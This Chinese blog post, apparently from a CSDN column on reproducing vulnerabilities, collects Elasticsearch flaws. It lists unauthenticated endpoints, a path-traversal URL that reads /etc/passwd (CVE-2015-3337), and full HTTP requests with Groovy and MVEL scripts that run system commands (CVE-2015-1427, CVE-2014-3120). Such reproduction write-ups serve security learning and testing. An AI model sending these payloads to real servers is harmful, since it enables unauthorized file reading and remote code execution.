Elasticsearch 漏洞收集总结

最新推荐文章于 2024-08-05 18:37:53 发布
最新推荐文章于 2024-08-05 18:37:53 发布
阅读量7.7k 收藏 4
点赞数 3
分类专栏: 漏洞复现 文章标签: elasticsearch 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sojrs_sec/article/details/103780988
版权

一:未授权访问获取敏感信息

/_cat/indices
/_plugin/sql/
/_nodes
/_search
/_search?preety
/_status

在这里插入图片描述

二:目录遍历漏洞(cve-2015-3337)

安装“site”功能的插件后,插件目录使用…/向上跳转,导致目录穿越漏洞,可读取任意文件。未安装site功能插件的不受影响
/_cat/plugins:查看所有已安装的插件
一般复现以head插件为例,若查看存在head插件,burp
访问

http://your-ip:9200/_plugin/head/../../../../../../../../../etc/passwd

参考:https://blog.csdn.net/qq_36374896/article/details/84145527

三: CVE-2015-1427任意命令执行

JAVA反射执行代码

插入数据:

POST /website/blog/ HTTP/1.1
Host: ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
  "name": "test"
}
执行JAVA代码
POST /_search?pretty HTTP/1.1
Host: ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 489
{
    "size":1,
    "script_fields": {
        "test#": {  
            "script":
                "java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getInputStream())).readLines()",
            "lang": "groovy"
        }
    }
}
利用Groovy执行命令
POST /_search?pretty HTTP/1.1
Host: 192.168.91.130:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

参考:https://blog.csdn.net/qq_36374896/article/details/84145374

四:cve-2014-3120 命令执行

要求es中先存在一条数据

POST /website/blog/ HTTP/1.1
Host: 192.168.15.130:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
{
  "name": "phithon"
}

代码执行

POST /_search?pretty HTTP/1.1
Host: 192.168.15.130:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343
{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}

参考:https://louisnie.github.io/2019/07/03/elasticsearch%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/

sojrs_sec
关注
专栏目录
利用Vulnhub复现漏洞 - ElasticSearch 目录穿越漏洞CVE-2015-3337)测试环境
JiangBuLiu的博客
07-02 1695
ElasticSearch 目录穿越漏洞CVE-2015-3337)测试环境Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现head插件 Vulnhub官方复现教程 https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/ 漏洞原理 在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞...
ElasticSearch 命令执行漏洞CVE-2014-3120)
weixin_59086772的博客
01-04 1995
0x00前言 Elasticsearch是荷兰Elasticsearch公司的一套基于Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。 0x01漏洞原理 ElasticSearch 1.2版本之前支持动态脚本。漏洞是通过_search方法的参数传入恶意代码,远程执行任意MVEL表达式和Java代码。 0x02影响版本 jre版本:openjdk:8-jre elasticsearch版本:v1.1.1 0x03环境搭建 do
ElasticSearch 目录穿越漏洞CVE-2015-3337
m0_65150886的博客
12-29 588
Elasticsearch是荷兰Elasticsearch公司的一套基于全文搜索引擎Apache Lucene构建的开源分布式RESTful搜索引擎,它主要用于云计算中,并支持通过HTTP使用JSON进行数据索引。在安装了具有“site”功能的插件以后,插件目录使用…/即可向上跳转,导致目录穿越漏洞,可读取任意文件。http://ip:9200/_plugin/head/ 即可看到。2.head插件提供了elasticsearch的前端页面,1.访问ip:port。3.抓包访问下面的接口。
未授权访问漏洞系列详解
最新发布
Jz031212的博客
08-05 1451
而我们这章的主题Kibana担任视图层角色,拥有各种维度的查询和分析并使用图形化的界面展示存放在Elasticsearch中的数据。2.使用TLS认证修改docker swarm的认证方式,使用TLS认证:Overview Swarm with TLS 和 Configure DockerSwarm for TLS这两篇文档,说的是配置好TLS后,Docker CLl在发送命令到docker daemon之前,会首先发送它的证书,如果证书是由daemon信任的CA所签名的,才可以继续执行。
Elasticsearch未授权访问漏洞
12-22 7253
  Elasticsearch服务普遍存在一个未授权访问的问题,攻击者通常可以请求一个开放9200或9300的服务器进行恶意攻击。 0x00 Elasticsearch 安装 前提,保证安装了JDK 1.7+ 下载地址:https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.5.0.zip (用迅雷打开下载,...
ElasticSearch 命令执行漏洞 CVE-2014-3120 漏洞测试
ADummy的博客
02-24 349
ElasticSearch 命令执行漏洞CVE-2014-3120) by ADummy 0x00利用路线 ​ Burpsuite抓包—>java代码放入json—>有回显命令执行 0x01漏洞介绍 ​ 老版本ElasticSearch支持传入动态脚本(MVEL)来执行一些复杂的操作,而MVEL可执行Java代码,而且没有沙盒,所以我们可以直接执行任意代码。 MVEL执行命令的代码如下: import java.io.*; new java.util.Scanner(Runtime.g
ElasticSearch几个漏洞总结
热门推荐
u011066706的专栏
04-17 2万+
ElasticSearch远程命令执行(CVE-2014-3120) 漏洞介绍: ElasticSearch有脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。 而在ElasticSearch 1.2之前的版本中,默认配置是打开动态脚本功能的,如
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1849
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
使用Elastic Security检测最新的spring4shell漏洞
点火三周的专栏
04-08 1434
这个漏洞在清明假期刚出来的时候就想研究一下,一直拖延到现在。看来是已经赶不上热度了,但我觉得还是值得记录一下的。特别是Elastic刚刚在Forrester的“终端检测与响应Wave”报告中, 被评为“Strong Performer”(卓越表现者) 而对于这种层出不穷的零日漏洞,即便是购买了昂贵的网络安全设备都防不住,只能做事后诸葛。那不如考虑看看免费的开源解决方案,并且检测与响应已经成为了一种安全防御的共识:边界防御是一定会被渗透的,快速的检测与响应是必须的。 Spring4Shell 漏洞的工作原理
elasticsearch-7.6.2.zip
04-14
总结,"elasticsearch-7.6.2.zip"提供的源代码有助于深入了解Elasticsearch的工作原理,对于开发人员来说,这是一份宝贵的资源,可以进行定制化开发,修复安全漏洞,优化性能,以满足特定业务需求。
elasticsearch-2.4.1+head
05-11
- 描述中提到"已经配置好的插件",意味着这个版本可能已经集成了某些第三方插件,如Kibana用于可视化,Logstash用于日志收集,Beats用于轻量级数据发送等,这些插件扩展了Elasticsearch的功能,使得数据分析和监控...
ELK —— Logstash 将 MySQL 数据同步至 ElasticSearch
2301_82242204的博客
04-23 1039
是基于Lucence的分布式搜索引擎,也可以作为“数据库”存储一些数据,同类产品还有一个叫做solr的,这里就不做描述谈到面试,其实说白了就是刷题刷题刷题,天天作死的刷。。。。。为了准备这个“金三银四”的春招,狂刷一个月的题,狂补超多的漏洞知识,像这次美团面试问的算法、数据库、Redis、设计模式等这些题目都是我刷到过的并且我也将自己刷的题全部整理成了PDF或者Word文档(含详细答案解析)66个Java面试知识点。
ElasticSearch单机或集群未授权访问漏洞
爱辉弟的博客
12-18 3641
ElasticSearch未授权访问漏洞,使用系统防火墙来做限制只允许ES集群和Server节点的IP来访问漏洞节点的9200端口,其他的全部拒绝。并在ES节点上设置用户密码
Elasticsearch 核心插件Kibana 本地文件包含漏洞分析(CVE-2018-17246)
ahhacker86的专栏
01-23 1374
LFI通常出现在PHP应用中,通样是require这次应用在Nodejs程序中,相信未来还会有更多的Nodejs程序存在这种问题,原因是本地包含漏洞出现了很多年,但依旧有很多软件开发人员和架构师没有考虑到这点,这篇文章很好的说明了Kibana中存在的一个关键LFI漏洞,使得攻击者能够在服务器上运行本地代码,可造成直接的危害就是拒绝服务攻击,若在生产环境下业务实在伤不起,需要引起对Nodejs LFI的重视。
ElasticSearch 命令执行漏洞CVE-2014-3120),2024年最新37岁程序员被裁
2401_83974607的博客
04-13 535
由于这是一个历史上的漏洞,如果你现在正在使用的 Elasticsearch 是最新的稳定版本,那么你应该已经不受此漏洞的影响。不过,仍然建议定期更新你的 Elasticsearch 实例以获取最新的安全修复和其他改进。
Elasticsearch漏洞汇总比较全
weixin_50464560的博客
08-23 5437
本测试环境同时运行了Tomcat和ElasticSearch,Tomcat目录在/usr/local/tomcat,web目录是/usr/local/tomcat/webapps;之后的新版,配置文件elasticsearch.yml中必须存在path.repo,该配置值为一个目录,且该目录必须可写,等于限制了备份仓库的根位置。不配置该值,默认不启动这个功能。我们的目标就是利用ElasticSearch,在/usr/local/tomcat/webapps目录下写入我们的webshell。
Elasticsearch 未授权访问漏洞
龙卷风摧毁停车场
03-08 5862
ElasticSearch 是一款 Java 编写的企业级搜索服务,启动此服务默认开放 HTTP-9200 端口,可被非法操作数据。
Elasticsearch漏洞
05-20
Elasticsearch是一种流行的开源搜索和分析引擎,但是它也可能存在一些漏洞。一些常见的Elasticsearch漏洞包括: 1. 未经身份验证的访问:如果没有正确配置身份验证和授权,攻击者可能会通过Elasticsearch的API访问敏感数据。 2. 注入攻击:攻击者可以通过在搜索查询中注入恶意代码来执行任意命令或访问敏感数据。 3. 敏感信息泄露:如果没有正确配置访问控制,攻击者可以访问未经授权的数据。 4. 数据篡改:攻击者可以修改数据,可能会导致恶意行为或错误的结果。 为了保护Elasticsearch,建议采取以下措施: 1. 配置身份验证和授权,只允许授权用户访问数据。 2. 验证所有输入,特别是搜索查询中的用户输入,以防止注入攻击。 3. 配置访问控制来限制敏感数据的访问。 4. 定期进行安全审计和漏洞扫描,及时修复任何发现的漏洞。 5. 及时更新Elasticsearch到最新版本,以便获得最新的安全补丁和修复程序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值